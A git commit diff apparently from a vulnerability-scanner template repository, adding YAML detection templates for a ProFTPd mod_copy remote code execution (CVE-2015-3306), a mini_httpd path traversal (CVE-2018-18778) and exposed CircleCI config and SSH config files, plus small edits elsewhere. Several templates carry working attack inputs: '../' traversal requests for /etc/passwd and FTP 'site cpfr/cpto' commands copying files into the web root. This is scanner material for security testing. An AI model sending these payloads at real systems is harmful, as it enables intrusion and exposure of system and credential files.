Noam Rathaus 2021-03-11 18:09:44 +02:00
commit f343a4d311
10 changed files with 109 additions and 4 deletions

View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts | | Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | cves | 237 | vulnerabilities | 105 | exposed-panels | 104 |
| exposures | 61 | technologies | 50 | misconfiguration | 54 | | exposures | 63 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - | | helpers | 2 | takeovers | 1 | - | - |
**75 directories, 712 files**. **75 directories, 716 files**.
</td> </td>
</tr> </tr>

View File

@ -9,6 +9,7 @@ requests:
- raw: - raw:
- | - |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers-condition: and

View File

@ -0,0 +1,27 @@
id: CVE-2015-3306
info:
name: ProFTPd RCE
author: pd-team
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
tags: cve,cve2015,ftp,rce,network
network:
- inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024
- data: "site cpto /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
read-size: 1024
matchers:
- type: word
words:
- "Copy successful"
part: raw

View File

@ -0,0 +1,24 @@
id: CVE-2018-18778
info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: high
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
tags: cve,cve2018,lfi
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

View File

@ -33,6 +33,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1 Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl

View File

@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
req-condition: true
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers: matchers:

View File

@ -0,0 +1,24 @@
id: circleci-config
info:
name: circleci config.yml exposure
author: geeknik
severity: low
reference: https://circleci.com/docs/2.0/sample-config/
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/config.yml"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("^version: ", body) && contains(body, "jobs:") == true'
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: circleci-ssh-config
info:
name: circleci ssh-config exposure
author: geeknik
severity: low
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/ssh-config"
matchers-condition: and
matchers:
- type: word
words:
- "Host"
- "HostName"
- "IdentityFile"
condition: and
- type: status
status:
- 200

View File

@ -46,8 +46,8 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
req-condition: true
matchers: matchers:
- type: dsl - type: dsl
name: iis-scan
dsl: dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"

View File

@ -19,6 +19,7 @@ requests:
GET /testing-put.txt HTTP/1.1 GET /testing-put.txt HTTP/1.1
Content-Type: text/plain Content-Type: text/plain
req-condition: true
matchers: matchers:
- type: dsl - type: dsl
name: multi-req name: multi-req